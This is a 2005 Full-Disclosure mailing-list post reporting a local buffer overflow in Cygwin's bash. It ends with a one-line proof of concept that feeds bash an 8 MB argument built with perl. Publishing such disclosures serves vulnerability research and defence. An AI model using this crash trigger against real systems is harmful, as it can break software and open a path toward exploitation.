[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[Full-disclosure] Cygwin Bash Buffer Overflow
- To: <full-disclosure@xxxxxxxxxxxxxxxxx>, <info@xxxxxxxxxxxxxx>, <submissions@xxxxxxxxxxxxxxxxxxxxxxx>, <bugs@xxxxxxxxxxxxxxxxxxx>, <bugtraq@xxxxxxxxxxxxxxxxx>
- Subject: [Full-disclosure] Cygwin Bash Buffer Overflow
- From: "Rodrigo Gutierrez" <rodrigo@xxxxxxxxxxxxxx>
- Date: Sat, 28 May 2005 20:43:38 -0400
Cygwin Bash Buffer Overflow
Author: Rodrigo Gutierrez <rodrigo@xxxxxxxxxxxxxx>
Affected: Versions of bash distributed by the cygwin project
vendor url: http://www.cygwin.com
Type: Local
Background.
Cygwin is a Linux-like environment for Windows. GNU BASH is the GNU
project's UNIX shell. It replaces the standard UNIX Bourne and Korn shells.
Description
I think that cygwin people are cool, but Full Disclosure is a life style,
this is all you get guys, 8 megs.
PoC
you@cygwin:~ /usr/bin/bash `perl -e "print 'a'x8388600"`
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/